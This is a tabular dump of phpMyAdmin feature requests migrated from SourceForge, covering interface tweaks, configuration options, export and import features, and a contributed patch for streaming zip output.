Original URL https sourceforge.net p phpmyadmin feature requests 1288 Original author drgang","enhancement"
"24444","5961","setting LoginCookieValidity > session.gc maxlifetime.
when setting LoginCookieValidity to a value greater than session.gc maxlifetime, the UI displays a message Your PHP parameter session.gc maxlifetime is lower that cookie validity configured in phpMyAdmin, because of this, your login will expire sooner than configured in phpMyAdmin.
however, a more accurate message should be displayed something like...
Your PHP parameter session.gc maxlifetime is lower than the cookie validity configured in phpMyAdmin, because of this, your login has a 1 in 100 chance of expiring after 1440 seconds of inactivity the actual numbers can be derived from session.gc divisor, session.gc probability and session.gc maxlifetime Original URL https sourceforge.net p phpmyadmin feature requests 1260 Original author cbfullerx","enhancement"
"24444","5962","store the last way you sorted your table somewhere.
in https sourceforge.net tracker ?func=detail atid=377411 aid=1161194 group id=23067 on Date 2007 04 13 00 26 09 GMT alex7h3pr0gr4mr wrote I would much rather have phpmyadmin store the last way you sorted your table somewhere, so next time you log in, it is in that same order.
Almost every single table I look at I want that table in a certain order, and adding this feature would defiantly help!
this would be great, at least store in session, the field that you last sorted a table by, so if you go somewhere else, and look again at that table, then it would be still sorted by that field also related https sourceforge.net tracker index.php?func=detail aid=2981999 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin feature requests 1261 Original author rubo77","enhancement"
"24444","5963","Application Packaging Standard.
An APS package for Plesk and anyone else that supports APS) would be great.
Details of APS here http www.apsstandard.org Original URL https sourceforge.net p phpmyadmin feature requests 1262 Original author dahamsta","enhancement"
"24444","5964","Syncronize Function to use secure remote connection.
The Synchronize functionality such research secure methods to connect to remote mysql server for synchronizing remote local db Original URL https sourceforge.net p phpmyadmin feature requests 1263 Original author dprophit","enhancement"
"24444","5965","session cache limiter private ) and login display bug.
Using session cache limiter private ) could provoke some display bug because it set a max age= session.cache expire in the future) Despite the Expires date to 1981, Firefox sometimes doesn t reload the page.
For example, modifing config.inc.php with a lot of servers could become hell.
I invite you to use nocache or remove the use of session cache limiter at least while the user is not logued.
Details File libs session.inc.php Line 57 some pages e.g.
stylesheet) may be cached on clients, but not in shared proxy servers session cache limiter private ); Original URL https sourceforge.net p phpmyadmin feature requests 1264 Original author tybaze","enhancement"
"24444","5966","Start session after login.
We watch on small virtual server with limited inodes 1000000) that every try of login makes a new session file in tmp.
If a lot of trys comes very fast in short time, the quota blocks the hole server, because of to much file on it.
I think this is not a problem on small virtual server.
It can happens on bigger too, it takes more time only.
May be a solution is to start the session after the valid login.
Original URL https sourceforge.net p phpmyadmin feature requests 1265 Original author arlt","enhancement"
"24444","5967","Server name badly positioned in browser title.
Currently, phpMyAdmin displays the title in the format webhost mysqlserver | phpMyAdmin version Most users are, I imagine, more concerned about which mysql server they are operating on, than which webhost they are connected to.
For users with more than a small number of tabs open, the default behaviour leads to this vital information being truncated.
For example, if phpmyadmin is running at www.example.com and I have three servers, mysql1.example.com, mysql2.example.com and mysql3.example.com my three tabs will all display www.example.... rather than the more useful mysql1, mysql2 and mysql3.
The only time I can see this being a disadvantage would be for users connecting to localhost.
In those circumstances, it should be trivial to display in the current format, so even localhost connections show the correct server name.
Original URL https sourceforge.net p phpmyadmin feature requests 1266 Original author albanach","enhancement"
"24444","5968","Option to restrict access to tabs.
We are offering a central PhpMyAdmin installation for our hosting customers which we locked down using the configuration.
Unfortunately, there is no option to disable certain tabs.
Original URL https sourceforge.net p phpmyadmin feature requests 1267 Original author syphernl","enhancement"
"24444","5969","Video Documentation.
I think, it would be great if there are video tutorials on how to using the features of PMA.
There are lots of features that people are not aware of.
So, video tutorials will help them to use the features.
Original URL https sourceforge.net p phpmyadmin feature requests 1296 Original author hiddenpearls","enhancement"
"24444","5970","Add Ajax For Edit SQL popup.
Hi phpMyAdmins, I would like to propose a UI improvement using AJAX.
I am not sure if this has been already proposed, but I think it is not and I would like to work on it as GSoC 2011 work if approved.
Under the Browse Section, when a user clicks on the edit button, there s a popup window.
With the current multitabbed browsers, it is sometimes very confusing for me to find my actual edit popup window.
I would propose for a AJAXified textarea to accept input from the textarea, and do a refresh for the div that shows the resultset.
I wish to provide more details in my proposal.
Look forward to your reply, Thank you, M.Ravi purple.coder yahoo.co.uk Original URL https sourceforge.net p phpmyadmin feature requests 1297 Original author anonymous","enhancement"
"24444","5971","Change default search to like .
I use the search feature dozens of times a day and I have to say the occasions when I actually want to do an exact match for the entire contents of a field are vanishingly small I think I ve done this once, maybe twice in the past year.
I m sure this is the same for most people.
Or it doesn t matter if it s the whole thing or just a part of it.
Every time i do a search I have to select Like ... when logically this, as the most useful option, should be the default.
So a) can this be changed?
or b) can I change it locally?
Original URL https sourceforge.net p phpmyadmin feature requests 1268 Original author tiggsy","enhancement"
"24444","5972","Column highlight in table view.
Is it possible to allow columns to be highlighted when clicking on column headings, in a similar way to how rows are currently highlighted?
This would be handy where there are multiple columns of numbers, bits or enums with the same values, next to each other and you are only interested in one of them.
For example, we have a table with five Enum Yes No columns next to each other and I may just be interested in one or two of them, as it is currently, it can be easy to lose track of which column you need to be looking at when flipping between your code and the database, which means scrolling back up to the column headings to find the right columns again.
I have seen examples of this working with mouseover and mouseout, so it should be possible to change this to an onclick event instead This seems to be a good way of doing it, it does however require JQuery http css tricks.com row and column highlighting Thanks Jim Original URL https sourceforge.net p phpmyadmin feature requests 1269 Original author jim wc","enhancement"
"24444","5973","allow specifying mime types and transformations in queries.
The mime types and transformations is a very nifty feature of phpMyAdmin.
However, I can t find any information on how one could specify this for queries or views.
Sometimes you want to keep the data fixed and generate queries that display mime output based on data from multiple tables.
It would be really nice if a mime specification syntax would be described for using in the SQL query windows.
Original URL https sourceforge.net p phpmyadmin feature requests 1270 Original author cengique","enhancement"
"24444","5974","Use foreign key for relation info.
AFAIK pMA supports relations, but only when manually defined.
Could foreign key info be used too?
For example, when a result is displayed with foreign keys, each key should be a link to the related record.
Original URL https sourceforge.net p phpmyadmin feature requests 1272 Original author olafvdspek","enhancement"
"24444","5975","Reload icon.
The reload icon looks like a play icon.
Isn t a better one available?
It also looks out of place.
Couldn t it be added to the button bar?
Original URL https sourceforge.net p phpmyadmin feature requests 1273 Original author olafvdspek","enhancement"
"24444","5976","Show 10 last used databases.
A nice feature would be to show a list of the 10 last used databases.
Original URL https sourceforge.net p phpmyadmin feature requests 1274 Original author anonymous","enhancement"
"24444","5977","Alignment of Go buttons.
Currently the GO buttons are floated right.
For example, inside the Export page, or when expanding the Options while browsing results.
Can I suggest not right aligning this button, but left align instead?
On a wide screen high resolution monitor, the button is very very far away from the action.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1276 Original author anonymous","enhancement"
"24444","5978","Replace hard coded limit with configurable option.
The maximum size of text fields is limited to 40 characters as follows PMA 3.3.8.1, tbl change.php, lines 911 912 field size should be at least 4 and max 40 fieldsize = min max field[ len ], 4), 40); Can this hard coded limit of 40 be replaced with a user configurable value?
With wide screens and wide data!
), this is an irksome restriction.
Original URL https sourceforge.net p phpmyadmin feature requests 1277 Original author fisharebest","enhancement"
"24444","5979","Create config option for datepicker.
We switched to the new beta version.
But find it really irritating when trying to work quickly that the datepicker is automatically displayed, and it s not possible to remove the values afterwards.
Because clicking redraws the datepicker.
Could an configuration option be created to disable it?
Original URL https sourceforge.net p phpmyadmin feature requests 1278 Original author sebastianberm","enhancement"
"24444","5980","option Truncate table before Insert into .
Can you add option Truncate table in the export data?
Some times we need export full table for copy it on other server.
thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1308 Original author sailormax","enhancement"
"24444","5981","Create option to disable certain verbose descriptions.
Would it be possible to create options to disable the descriptions in the images for Browse mode) gt; Edit gt; Edit inline gt; Delete All the different actions in structure mode that aren t in the dropdown.
As phpmyadmin power users this seems to be quite irritating, and take up a lot of space...
Tested with latest beta version) Original URL https sourceforge.net p phpmyadmin feature requests 1279 Original author sebastianberm","enhancement"
"24444","5982","FF cache issue patch for 2.11 good for 3.x version too ?.
https bugzilla.mozilla.org show bug.cgi?id=618835 If not please ignore this enhancement request.
Original URL https sourceforge.net p phpmyadmin feature requests 1280 Original author toralf foerster","enhancement"
"24444","5983","Problems with table buttons Empty,Drop).
The current quality of warning before dropping a table which can be holding thousands of lines of information) is not good at all.
The current interface specially the table buttons) priorize size and simplicity to save screen space) but lets SECURITY to a second plan, giving chance to disasters.
In English the label buttons make it very clear Empty and Drop , they have dramatically different meanings.
But in other languages as in Portuguese, the translation of one simple word can lead to confusion and disasters) because Limpar e Eliminar have very similar meanings, so, a person can select some rows and click on the last button instead of the penultimate, thinking they are cleaning the selected rows, Ok, a waring with lower case message which passes almost unwatched) is presented, but the user don t read, they think OK, delete my selected rows, fast !!!
and UNFORTUNATELY is surprised with a dropped table message !
I am here to suggest adding one simple word in the second button label, the word TABLE for all languages, because when you read Eliminar Tabela equivalent to Drop Table ) you will be much more able to avoid clicking in the last button to clean some table rows...
Please pay attention to this, it is a big trouble dropping a table when you wanted to delete a few rows...
The habit of guessing a confirmation dialog in this case causes the disaster.
This could also be reduced by USING CAPITAL LETTERS TO CALL ATTENTION !!!
Original URL https sourceforge.net p phpmyadmin feature requests 1281 Original author anonymous","enhancement"
"24444","5984","No DROP DATABASE warning deleting a user).
Hi!
If you delete a database you ll get a warning.
OK.
If you delete a user and select to delete its database you won t get any warning!
With one wrong click everything is gone!
The Interface is missleading because the button is located in the near of the question to delete the user.
It is very easy to mix these both options.
Please implement another question before deleting the database this way!
Thanks, Gerald Original URL https sourceforge.net p phpmyadmin feature requests 1282 Original author stepman","enhancement"
"24444","5985","Improve Relational View Interface.
I generally add foreign keys using the sql statements, however some times I use the Relational View interface to add a foreign key relation in a database with hundreds of tables, it is a real pain to scroll through all the relations and then identify the one which is required though thy are in alphabetical order, if there are lots of tables then it becomes difficult) Suggestion Instead of showing all the foreign key relations in one drop down, it would be nice to break it down into two drop downs 1. drop down that lists all the tables and 2.
When a table is selected, it lists all the columns in the table) Advantages 1\.
Makes it easy to select the right table and the required column user friendly 2\.
Avoids setting up the wrong keys i myself have associated wrong keys many times due to similar table names and column names) Original URL https sourceforge.net p phpmyadmin feature requests 1283 Original author naveensnayak","enhancement"
"24444","5986","Skip dumping data comment if table is empty.
Could you skip the dumping data comment if a table is empty?
Original URL https sourceforge.net p phpmyadmin feature requests 1284 Original author olafvdspek","enhancement"
"24444","5987","show all quick field actions in table structure.
When browsing the structure of a table in a database, there are certain actions for each field in the table, like delete, modify, make primary key etc.
The delete and modify actions are visible, while all the other actions fall under the more category, which shows up when moving the mouse over it.
I think it would be most useful to let users decide which actions they want to be always visible, and which can be hidden.
For example, someone with a large screen, like me, would probably choose to always show them all.
The same concept could also be applied to the tabs Browse, Structure, SQL, etc), in order to hide some of them if you have a small screen.
Original URL https sourceforge.net p phpmyadmin feature requests 1314 Original author tasso1985","enhancement"
"24444","5988","Allow to select an engine on Import.
When using Import the table is created with ENGINE=MyISAM .
Please remove this so the default engine will be used or allow to choose an engine default selecting the MySql default engine).
Original URL https sourceforge.net p phpmyadmin feature requests 1285 Original author anonymous","enhancement"
"24444","5989","Revert Export Page.
I m sorry, but WTF happened with the export page?
It used to be a simple page that fitted on my screen, now it takes 3 screens and it s far from simple.
Original URL https sourceforge.net p phpmyadmin feature requests 1286 Original author olafvdspek","enhancement"
"24444","5990","optimize, repair table .... Hi.
this is mostly a feat.
request but can be a bug on the other side.
phpmyadmin is in use for several people!
customer with view only access, developer and server administrators.
well in some points the configuration need to be extended i think.
A feature in config.inc is needed to disable maintainance functions like optimize, repair and so on.
on very large databases a simple click on this function can break or strongly slow down a hole platform for hours!
... killing those processes will be the next bad idea if you want to crash you table database.
kind regards flobee Original URL https sourceforge.net p phpmyadmin feature requests 1287 Original author flobee","enhancement"
"24444","5991","Table Browse > Delete Row should use AJAX dialogs.
By AJAX dialogs I mean the style that s presented when attempting to drop a database, for instance.
Or the table Drop link on a database s Structure tab.
This is not the style used in a table s Browse tab, when selecting Delete for a row or the group Delete at the bottom of the page.
Original URL https sourceforge.net p phpmyadmin feature requests 1289 Original author ibennetch","enhancement"
"24444","5992","Add a New User page link styling.
In the page to Add a new User , the in the Global privileges area, there are Check All and Uncheck All links these currently are the same style as regular text.
I think they should be set at least in blue to show that they are actual clickable items.
Original URL https sourceforge.net p phpmyadmin feature requests 1290 Original author ibennetch","enhancement"
"24444","5993","Operations tab non AJAX dialogs.
In both cases here I ll be referring to the text link in the appropriate Operations tab.
When dropping a database, the new Ajax dialog is used.
When dropping a table, the old style popup is used.
Note that the Drop link from a table s Structure tab does use the Ajax.
to reproduce enter a database, then a table.
Pick the Operations tab and Delete the table DROP) in the bottom right).
Empty the table TRUNCATE) should probably be switched as well.
Original URL https sourceforge.net p phpmyadmin feature requests 1291 Original author ibennetch","enhancement"
"24444","5994","Export view as if it was a table.
It would be nice to be able to export a view output as if it was a table.
E.g.
select a view, click export as table) and then it creates a create table with insert queries.
Original URL https sourceforge.net p phpmyadmin feature requests 1321 Original author csware","enhancement"
"24444","5995","Change password buttons should match.
From the main page, following the Change password link results in an AJAX popup which has a large AJAX style Cancel button and a small older form style Go button.
The Go should match the Cancel, as is seen in the Add new user dialog.
Original URL https sourceforge.net p phpmyadmin feature requests 1292 Original author ibennetch","enhancement"
"24444","5996","Server variables and settings page help.
in the page server variables.php you should add the descriptions for each variable, and a link to this page; http dev.mysql.com doc refman 5.5 en server system variables.html and variables, that are performance critical should be shown in red Original URL https sourceforge.net p phpmyadmin feature requests 1293 Original author rubo77","enhancement"
"24444","5997","show row s) starting from row 0 .
somehow this was closed by the robot and I cannot reply any more https sourceforge.net tracker ?func=detail atid=377411 aid=2937123 group id=23067 the idea was, to have a button to show nearly all rows of a table, that can be used with the mouse.
a field to type in how many rows you want to see every time is not enough!
and there is a bug anyway if you type this in the field now for ex.
50 rows) and press show , then it shows all entries starting from row 51 till 100 thats not good, the first time you press show, it should show entry 0 49 Original URL https sourceforge.net p phpmyadmin feature requests 1294 Original author rubo77","enhancement"
"24444","5998","stream .zip output on the fly.
I get this error Allowed memory size of [N] bytes exhausted when using [phpmyadmin phpmyadmin] libraries zip.lib.php to generate large .zip files in CGI scripts.
Most solutions on the web suggest boosting memory limit in php.ini apache).
The diff output below I ll add a patch shortly) provides a way to stream .zip files direct to stdout it should probably be changed to use an arbitrary stream).
These changes also contain a fix for a bug in the file timestamps dechex ) does not produce the necessary 8 character strings for older timestamps).
All that is needed to use this option is to add a call to gt;setDoWrite ) immediately after the instantiation of the zipfile class e.g.
require zip.lib.php [...] zf = new zipfile; zf gt;setDoWrite ); for filnames as fn) \{ zf gt;addFile file get contents fn), basename fn)); \} echo zf gt;file ); gt;file ) returns empty string after gt;setDoWrite ) Diff output follows; modified zip.lib.php, called zipstream.lib.php, is attached.
27a28,34 gt; Whether to write zip file via echo in one pass and have gt; have gt; file return an empty string, or to save all info gt; and have gt; file ) return entire zip file in a string gt; gt; var doWrite = false; gt; gt; 55a63,66 gt; function setDoWrite ) \{ gt; this gt; doWrite = true; gt; \} gt; 96c107 lt; dtime = dechex this gt;unix2DosTime time)); gt; dtime = substr 00000000 .
dechex this gt;unix2DosTime time)), 8); 133,134c144,149 lt; add this entry to array lt; this gt; datasec[] = fr; gt; write this entry on the fly, ... gt; if this gt; doWrite) \{ gt; echo fr; gt; \} else \{ ... OR add this entry to array gt; this gt; datasec[] = fr; gt; \} 165c180 lt; Dumps out file gt; Dumps out file to stdout if gt;doWrite==true, else to return value as string 167c182,183 lt; return string the zipped file gt; return string if gt;doWrite ==false the zipped file gt; else the empty string 173,184c189,212 lt; data = implode , this gt; datasec); lt; ctrldir = implode , this gt; ctrl dir); lt; lt; return lt; data .
lt; ctrldir .
lt; this gt; eof ctrl dir .
lt; pack v , sizeof this gt; ctrl dir)) .
total of entries on this disk lt; pack v , sizeof this gt; ctrl dir)) .
total of entries overall lt; pack V , strlen ctrldir)) .
size of central dir lt; pack V , strlen data)) .
offset to start of central dir lt; \x00\x00 ; .zip file comment length gt; if this gt; doWrite ) \{ gt; ctrldir = implode , this gt; ctrl dir); gt; echo ctrldir; gt; echo this gt; eof ctrl dir; gt; echo pack v , sizeof this gt; ctrl dir)); total of entries on this disk gt; echo pack v , sizeof this gt; ctrl dir)); total of entries overall gt; echo pack V , strlen ctrldir)); size of central dir gt; echo pack V , this gt; old offset); offset to start of central dir gt; echo \x00\x00 ; .zip file comment length gt; return ; gt; \} else \{ gt; data = implode , this gt; datasec); gt; ctrldir = implode , this gt; ctrl dir); gt; gt; return gt; data .
gt; ctrldir .
gt; this gt; eof ctrl dir .
gt; pack v , sizeof this gt; ctrl dir)) .
total of entries on this disk gt; pack v , sizeof this gt; ctrl dir)) .
total of entries overall gt; pack V , strlen ctrldir)) .
size of central dir gt; pack V , strlen data)) .
offset to start of central dir gt; \x00\x00 ; .zip file comment length gt; \} Original URL https sourceforge.net p phpmyadmin feature requests 1295 Original author drbitboy","enhancement"
"24444","5999","Remove animation for old AJAX response removal.
I executed a query which returns no rows multiple times, when a new message arrives the previous one is faded out.
It makes elements of the screen to move, and for a short while I have two result messages.
What about removing this effect and just deleting old result?
The hiding of Loading message should be an appropriate indicator for saying whether the result we see is the one pertaining to the last query.
Original URL https sourceforge.net p phpmyadmin feature requests 1298 Original author crackpl","enhancement"
"24444","6000","hide show columns.
The idea is to enable the user to hide show the displayed columns.
This can be really helpful for a table with many columns.
For example, if a user wants to compare two columns first and the last), he can just hide the unimportant columns and concentrate on the important ones.
Although he can also write a select query for the same purpose.
Original URL https sourceforge.net p phpmyadmin feature requests 1299 Original author onebighack","enhancement"
"24444","6001","tracking changes of store proc,triggers,events.
It would be very useful if pma would add support for tracking changes of store procedures functions,triggers and events.This would allow use of the tracking in full and without any additional software Original URL https sourceforge.net p phpmyadmin feature requests 1300 Original author pavelvd","enhancement"
"24444","6002","Allow user configurable number of initial table fields.
When clicking on the Create Table button in the left nav, because I wasn t able to specify the number of fields to create, it will default to 2 fields.
This setting would be good as a configuration option.
Something like cfg[ NumFieldsCreated ], or can be server based as cfg[ Servers ][ i][ num fields created ] or whatever, name not important) Then replace the hard coded 2 on line 69 of tbl create.php with the entered option.
Original URL https sourceforge.net p phpmyadmin feature requests 1301 Original author benjamwelker","enhancement"
"24444","6003","Dialogs when dropping indices.
Two different type of dialogs are shown to the user when dropping an index.
1) a jQuery dialog 2) a red blue box following a pageload To reproduce 1) demo server gt; sakila database gt; actor table 2) try to drop the primary key 3) a jQuery dialog is shown 1) demo server gt; sakila database 2) create table `t1` gt; CREATE TABLE IF NOT EXISTS `t1` `a` int 11) NOT NULL AUTO INCREMENT, PRIMARY KEY `a`)); 3) go to table `t1` 4) try to drop the primary key 5) the page is reloaded and a red blue dialog is shown and finally 6) clicking on No does not take you to the previous page I guess this is a bug) Rouslan Original URL https sourceforge.net p phpmyadmin feature requests 1302 Original author roccivic1","enhancement"
"24444","6004","Export to Zip file with password encryption function.
Export to Zip file with password encryption function.
I m owner of e commerce shopping website that using PHPMYADMIN as DB Admin.
However, I don t want my backup operator see the exported data that I exported to sql zip file for him to do backup job to another Harddisk or backup media elsewhere bacause of privacy of my customer.
Can you put password encrytion feature in the Export page when export to zip file?
Thank you very much Sorry for bad English gramma or the word that I m using is impolite word for you.
Original URL https sourceforge.net p phpmyadmin feature requests 1303 Original author kanitchet","enhancement"
"24444","6005","Text difficult to read when action not possible.
The text displayed when a tab is not possible for instance, Search and Browse on an empty table) is difficult to read.
It s grey silver on a pink background; I think making it black the standard way of presenting non link text) or even the standard link color used in the rest of the tabs would make it more legible.
Original URL https sourceforge.net p phpmyadmin feature requests 1304 Original author ibennetch","enhancement"
"24444","6006","Search box for database name.
We have many databases on our server, and a good feature would be to have a search box for database name on the front page or in on the left side Original URL https sourceforge.net p phpmyadmin feature requests 1305 Original author virer","enhancement"
"24444","6007","add lock tables, disable keys options.
Would be nice if import and export had lock tables and disable keys option, it would greatly speed up the process for large imports exports.
When importing large datasets if the table was locked and the keys where disabled, the the time needed to insert many rows would be very short like mysql command line import tool does.
the keys would be renenabled after inserts finished and recalculated all at once.
Original URL https sourceforge.net p phpmyadmin feature requests 1306 Original author anonymous","enhancement"
"24444","6008","Toggle relation lines in Designer.
is it possible to hide relations lines) in designer from a table?
for ex i have a lang table which has relations to 30 other tables which makes the table schema very difficult to read.
the should be some button to hide table relations next to gt; button the setting should be saved too thanks Original URL https sourceforge.net p phpmyadmin feature requests 1335 Original author freeman3","enhancement"
"24444","6009","Config option for popup when creating new table.
First of all, great new theme ) Would it be possible to add a config option to be able to disable the mootools popup used when creating a new table, and instead, just refresh the screen as it used to do with old versions?
We usually create tables with over 10 columns, and on smaller screens we can t resize the popup enough to make it look nice and functional enough.
We usually already did have scroll bars for this, but the fact the res is just 1280x1024, causes more loss of overview now.
Original URL https sourceforge.net p phpmyadmin feature requests 1307 Original author sebastianberm","enhancement"
"24444","6010","Create with same name AND grant on user\ .
When creating a user, it is possible to select Create database with same name and grant all privileges OR Grant all privileges on wildcard name username\ ) I usually want to do both for a user, create a database with the same name to start with and let him be able to create additional databases.
So, could the radio boxes be changed to checkboxes?
The None option can also be removed that way.
Original URL https sourceforge.net p phpmyadmin feature requests 1337 Original author joolee","enhancement"
"24444","6011","Wording about Column.
Greetings, Looking at the Create Table dialog, it used to say Field for the name of the column.
Now it says Column ...neither of which are very intuitive.
Can we change it to Column name ?
Original URL https sourceforge.net p phpmyadmin feature requests 1309 Original author ibennetch","enhancement"
"24444","6012","Remove action titles.
In 3.4 there seems to be action titles added.
Please add a parameter into config.php so I can disable the display of the texts.
And if you re busy with it, you might make it a tree way?
Icon , Text , Both ?
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1310 Original author g00fy","enhancement"
"24444","6013","FAQ 4.2 and PHP>=5.3.0.
Since PHP 5.3.0, safe mode has been depreciated.
However, FAQ 4.2 suggests using safe mode.
This should probably be improved to match current security trends.
Original URL https sourceforge.net p phpmyadmin feature requests 1311 Original author ibennetch","enhancement"
"24444","6014","set time zone for session.
I need to set or select) time zone for session of phpMyAdmin.
It s useful becasue the system is on a web hosting and I can not select time zone for server, but if I could select it on server page of phpMyAdmin along with MySQL connection collation and Language and then setted value were added to all queries as SET time zone = 4 00 ; for example.
It would be great, because all timestamps will be in the local time.
Original URL https sourceforge.net p phpmyadmin feature requests 1312 Original author fsadmin","enhancement"
"24444","6015","Option to hide hyperlink texts of edit , edit inline etc.. Hello, when browsing a table, in the main frame are links like Edit , Edit Inline etc.
An option would be nice, to hide the text and just display the icons, as this was in versions before.
Thanks in advance.
Original URL https sourceforge.net p phpmyadmin feature requests 1313 Original author casperklein","enhancement"
"24444","6016","Table structure disable popup menu under Action.
When viewing the table structure of a complex table, often there is a delay in rendering the page because the drop down menu under the Action column is being created.
This is quite annoying.
In previous versions all 7 action icons were displayed under the Action column.
Now the following functions have been moved to a drop down menu Browse unique values, add primary key, add unique key, add index, add fulltext index.
This drop down menu makes these functions slower to access and causes an uneccessary UI delay on older machines browsers whilst the menus are built rendered.
I propose that you should be able to disable this action drop down menu through configuration, and revert to the full iconified view of previous versions.
Cheers, B Original URL https sourceforge.net p phpmyadmin feature requests 1346 Original author batfastad","enhancement"
"24444","6017","Repair order in input edit previous entries.
A while back, the order of items shown when you put the cursor in a field so you can pick a previously used entry was in a logical order alphanumeric, in fact.
Then it started being displayed in a very bad order, totally mixed up, which seems to be based on how often you have used that particular entry.
It makes it very difficult to a) see if you ve used it already or b) find and select it.
But I ve found a fix, which I can t implement, but you can.
http social.msdn.microsoft.com Forums en US sharepointinfopath thread 4f739cec 220e 4ab2 a6d9 13079e43844a I would be SO pleased if you would implement this, though I really have no idea what loon has made this change in the first place which doesn t just affect phpMyadmin, though this is where it affects me most).
Original URL https sourceforge.net p phpmyadmin feature requests 1315 Original author tiggsy","enhancement"
"24444","6018","Ability to export structure of all tables but some data.
I would like to export the structure of all tables but exclude the data from some tables.
I don t want to have to truncate those tables or create two separate database dumps.
Original URL https sourceforge.net p phpmyadmin feature requests 1316 Original author mstrelan","enhancement"
"24444","6019","Select multiple rows with shift was in 3.3).
In 3.3, one could select multiple rows by checking a box, than holding shift while checking a box a few rows below or above.
like in GMail) Since 3.4, this function doesn t work anymore.
Change that added it to 3.3 https sourceforge.net tracker ?func=detail atid=377410 aid=2812070 group id=23067 Original URL https sourceforge.net p phpmyadmin feature requests 1317 Original author joolee","enhancement"
"24444","6020","column edit AFTER parameter.
Can you add into column editing form parameter Place after with combobox of field list sys name First for possibility reorder fields in the table?
In result you need just add AFTER column name or FIRST at end of ALTER TABLE query.
Looks like this feature reordering columns) requested since 2002 year, but without described solution.
Here is the simple solution ) thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1318 Original author sailormax","enhancement"
"24444","6021","Permit to create index when creating foreign key.
It is required to have index prior to creating foreign key.
phpMyAdmin currently offers only fields which do have foreign key.
Instead it should offer all fields and automatically create index when necessary.
Original URL https sourceforge.net p phpmyadmin feature requests 1319 Original author nijel","enhancement"
"24444","6022","Checkboxes to import data.
What I d REALLY love to see is the ability, when doing an import, to choose a full .sql file, upload it, then be taken to a page that lists perhaps a treeview of all the tables found, with a checkbox next to each one, then I can put a checkbox in only the ones that I want to import.
The PHPMYAdmin will simply import the ones that have been checked.
This would save me alot of work when only wanting to import certain tables from an entire huge database, and having to first open the SQL file in a text editor, manually deleting all of the unwanted tables, or cutting out and pasting of only the tables that I do want, into a new file first.
Original URL https sourceforge.net p phpmyadmin feature requests 1354 Original author anonymous","enhancement"
"24444","6023","Be able to toggle a database to Read Only.
I made a copy of a database for storage purposes.
It would be great to have a button to disable all update delete privileges Original URL https sourceforge.net p phpmyadmin feature requests 1320 Original author aelster","enhancement"
"24444","6024","Numeric format.
Hi, At the moment the structure page contains text like 2,441 KiB .
Could this be changed to 2.38 MiB ?
Two thousand kilobyte sounds weird compared to 2 megabyte.
Original URL https sourceforge.net p phpmyadmin feature requests 1356 Original author olafvdspek","enhancement"
"24444","6025","Compound statements when Creating Event.
It is not possible to use compound statement syntax http dev.mysql.com doc refman 5.0 en sql syntax compound statements.html) in the DEFINITION field of Create Event form of the phpMyAdmin version 3.5.0 dev.
There should be another field called delimiter which would allow us to change the default semicolon) delimiter to something else.
This kind of field is already implemented in the SQL tab for manual SQL statements.
I think though, it d be even nicer if the phpMyAdmin identifies an END after a semi colon and automatically change the delimiter before executing the query and add it just after the END .
I know there might be an issue if the user enter the chosen by pMA dev team) delimiter, which would terminate the query before it should.
However, that can be prevented by choosing a very uncommon character or a set of them) as delimiter and searching for them before executing the query.
Now, a tiny bug the link which calls the form is add event but the form is called create event .
In order to be coherent to the original SQL statement CREATE EVENT) I would change the Add Event link to Create Event and then it s all standardized.
That s all for now; congratulations to all developers involved in this amazing project and I hope I helped somehow.
Regards, Leonardo.
Original URL https sourceforge.net p phpmyadmin feature requests 1322 Original author leods92","enhancement"
"24444","6026","Automatic Refresh Process List.
Hi, it would be nice to have the possibility to select a automatic Refresh of the Process list.
So I could keep Track to watch the Connections a time, while Users are playing with the DB.
Nice would be 1 Second 3 Seconds 5 Seconds 15 Seconds 30 Seconds 1 Minute User a Inputbox Original URL https sourceforge.net p phpmyadmin feature requests 1323 Original author tux12fun","enhancement"
"24444","6027","Suggested for check timezone setting.
In libraries common.inc.php, on lines 276 278 It is written todo need to decide how we should handle this without ) date default timezone set date default timezone get )); I suggest that this should be set from the configuration file something like cfg[ Timezone ]) and if not set, default to UTC .
Original URL https sourceforge.net p phpmyadmin feature requests 1324 Original author allyunion","enhancement"
"24444","6028","Please, remove the frameset.
This is actually a feature request more than a bug report.
Lets face it.
The frameset of phpmyadmin is not pretty.
How many websites nowadays do you find that uses framesets?
What is the main reason there are so few?
I suggest a switch to html5 with the nice lt;!doctype html gt; prefix.
Sometimes, I want to shift click a link in the right frame to get another window so I can have different tables in different windows.
Then, the resulting window will miss the left frame.
I also want to give positive feedback thanks for phpmyadmin, a useful application that I use daily.
Original URL https sourceforge.net p phpmyadmin feature requests 1325 Original author anderslinden2","enhancement"
"24444","6029","CSV Import creates one large table.
phpmyadmin 3.44 mysql 5.1.58 PHP 5.2.17 Is the CVS import supposed to work for entire databases?
Or just one table at a time?
When I export a wordpress or joomla database as CVS and then try to import it, it creates one large table with all off the data called TABLE 1 Is it working as intended to only apply on a per table basis?
Perhaps this option should only become available when a specific table is selected, but not the entire db.
Original URL https sourceforge.net p phpmyadmin feature requests 1326 Original author jpratt1","enhancement"
"24444","6030","improved query profiler.
it would be great if you could implement summary of query profiler, described in this article http www.mysqlperformanceblog.com 2012 02 20 how to convert show profiles into a real profile Original URL https sourceforge.net p phpmyadmin feature requests 1363 Original author anonymous","enhancement"
"24444","6031","Hide Add user link if user does not have privileges.
If user does not have necessary privileges, hide the Add user or Edit user links Original URL https sourceforge.net p phpmyadmin feature requests 1327 Original author pb30","enhancement"
"24444","6032","Pre Synchronize structure and data separately.
Synchronizing everything with a remote database can take some time before even producing results.
As the Structure part of synchronizing seems to take the majority of the time, consider having additional options to be able to run Structure Synchronization and Data Synchronization separately.
Original URL https sourceforge.net p phpmyadmin feature requests 1328 Original author supersanti","enhancement"
"24444","6033","Can t rename column with foreign key constrain.
If a column has a foreign key constraint, you cannot rename it.
PMA will try, but MySQL returns an errno 150.
Better would be for PMA to lock the name in the interface perhaps with an explanation why when hovering over it).
Original URL https sourceforge.net p phpmyadmin feature requests 1329 Original author anonymous","enhancement"
"24444","6034","Ajax dialog for editing a view.
Now that we have an Ajaxified dialog for creating a view, editing a view should also happen in the same dialog.
This would allow changing of options related to the view easily.
Original URL https sourceforge.net p phpmyadmin feature requests 1373 Original author madhuracj","enhancement"
"24444","6035","Show database in syncrhonize source target dropdown.
